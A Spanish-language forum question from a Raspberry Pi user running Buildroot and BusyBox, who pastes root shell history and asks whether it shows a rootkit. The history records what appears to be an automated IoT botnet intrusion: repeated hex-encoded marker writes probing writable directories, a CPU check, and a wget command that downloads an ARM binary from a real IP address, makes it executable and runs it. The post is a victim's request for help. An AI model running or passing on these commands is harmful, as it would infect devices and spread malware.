busybox rootkit?

1

Utilizo Buildroot zImage y la compilación del kernel para mis rpis y busybox para mi caja de comandos de Linux.

Es la segunda vez que parece que tengo un rootkit, una historia de root sh me lo da, así que mi pregunta es: ¿es un rootkit?

324  /bin/busybox cp; /gweerwe323f
  325    mount ;/gweerwe323f
  326    echo -e '\x47\x72\x6f\x70/' > //.nippon;   cat //.nippon;   rm -f //.nippon
  327    echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon;   cat /tmp/.nippon;   rm -f /tmp/.nippon
  328    echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon;   cat /var/tmp/.nippon;   rm -f /var/tmp/.nippon
  329    echo -e '\x47\x72\x6f\x70/' > //.nippon;   cat //.nippon;   rm -f //.nippon
  330    echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon;   cat /dev/.nippon;   rm -f /dev/.nippon
  331    echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon;   cat /sys/.nippon;   rm -f /sys/.nippon
  332    echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon;   cat /proc/.nippon;   rm -f /proc/.nippon
  333    echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon;   cat /dev/shm/.nippon;   rm -f /dev/shm/.nippon
  334    echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon;   cat /dev/pts/.nippon;   rm -f /dev/pts/.nippon
  335    echo -e '\x47\x72\x6f\x70/run' > /run/.nippon;   cat /run/.nippon;   rm -f /run/.nippon
  336    echo -e '\x47\x72\x6f\x70/run/lock' > /run/lock/.nippon;   cat /run/lock/.nippon;   rm -f /run/lock/.nippon
  337    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon;   cat /sys/fs/cgroup/.nippon;   rm -f /sys/fs/cgroup/.nippon
  338    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon;   cat /sys/fs/cgroup/systemd/.nippon;   rm -f /sys/fs/cgroup/systemd/.nippon
  339    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon;   cat /sys/fs/cgroup/cpuset/.nippon;   rm -f /sys/fs/cgroup/cpuset/.nippon
  340    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpu,cpuacct' > /sys/fs/cgroup/cpu,cpuacct/.nippon;   cat /sys/fs/cgroup/cpu,cpuacct/.nippon;   rm -f /sys/fs/cgroup/cpu,cpuacct/.nippon
  341    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon;   cat /sys/fs/cgroup/blkio/.nippon;   rm -f /sys/fs/cgroup/blkio/.nippon
  342    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon;   cat /sys/fs/cgroup/devices/.nippon;   rm -f /sys/fs/cgroup/devices/.nippon
  343    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon;   cat /sys/fs/cgroup/freezer/.nippon;   rm -f /sys/fs/cgroup/freezer/.nippon
  344    echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon;   cat /sys/fs/cgroup/net_cls/.nippon;   rm -f /sys/fs/cgroup/net_cls/.nippon
  345    echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon;   cat /proc/sys/fs/binfmt_misc/.nippon;   rm -f /proc/sys/fs/binfmt_misc/.nippon
  346    echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon;   cat /dev/mqueue/.nippon;   rm -f /dev/mqueue/.nippon
  347    echo -e '\x47\x72\x6f\x70/sys/kernel/debug' > /sys/kernel/debug/.nippon;   cat /sys/kernel/debug/.nippon;   rm -f /sys/kernel/debug/.nippon
  348    echo -e '\x47\x72\x6f\x70/sys/kernel/config' > /sys/kernel/config/.nippon;   cat /sys/kernel/config/.nippon;   rm -f /sys/kernel/config/.nippon
  349    echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon;   cat /tmp/.nippon;   rm -f /tmp/.nippon
  350    echo -e '\x47\x72\x6f\x70/boot' > /boot/.nippon;   cat /boot/.nippon;   rm -f /boot/.nippon
  351    echo -e '\x47\x72\x6f\x70/run/user/0' > /run/user/0/.nippon;   cat /run/user/0/.nippon;   rm -f /run/user/0/.nippon
  352    echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon;   cat /proc/sys/fs/binfmt_misc/.nippon;   rm -f /proc/sys/fs/binfmt_misc/.nippon
  353  /gweerwe323f
  354   cat /bin/echo ;/gweerwe323f
  355    cat /proc/cpuinfo;/gweerwe323f
  356  cd /;   wget http://195.22.127.83/bins/usb_bus.arm7 -O - > usb_bus ;   chmod 777 usb_bus ; ./usb_bus ;/gweerwe323f
  357  ps aux
  358  dmesg
    
pregunta stefff 20.03.2017 - 10:07
fuente

0 respuestas

Lea otras preguntas en las etiquetas